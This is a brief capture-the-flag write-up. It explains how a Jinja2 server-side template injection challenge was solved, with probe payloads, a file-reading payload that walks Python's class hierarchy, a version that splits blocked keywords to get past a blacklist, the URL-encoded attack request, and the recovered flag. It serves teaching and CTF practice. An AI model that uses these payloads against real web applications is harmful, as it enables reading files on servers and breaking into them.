Test Condition: {{'7'*7}}
Config : {{config}}
Request not blocked : {{request}}
After successive tries, figured out class keyword was blacklisted and so did many important keywords. But we can use + to concat two strings and use it.
General file reading payload for Jinja2 is
{{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }}
But some keywords were blocked. So split and profit
{{''['__cla'+'ss__']['__mr'+'o__'][2]['__subcla'+'sses__']()[40]('fl'+'ag', 'r').read()}}
This acts same as the above payload due to the property access (http://jinja.pocoo.org/docs/2.10/templates/)
Hence, you send it after URL encoding http://web.euristica.in/hard_to_hack/index?data=%7B%7B%27%27%5B%27__cla%27%2B%27ss__%27%5D%5B%27__mr%27%2B%27o__%27%5D%5B2%5D%5B%27__subcla%27%2B%27sses__%27%5D()%5B40%5D(%27fl%27%2B%27ag%27%2C%20%27r%27).read()%7D%7D
flag{BlackListing_N3Ver_H3lp3d_An40ne}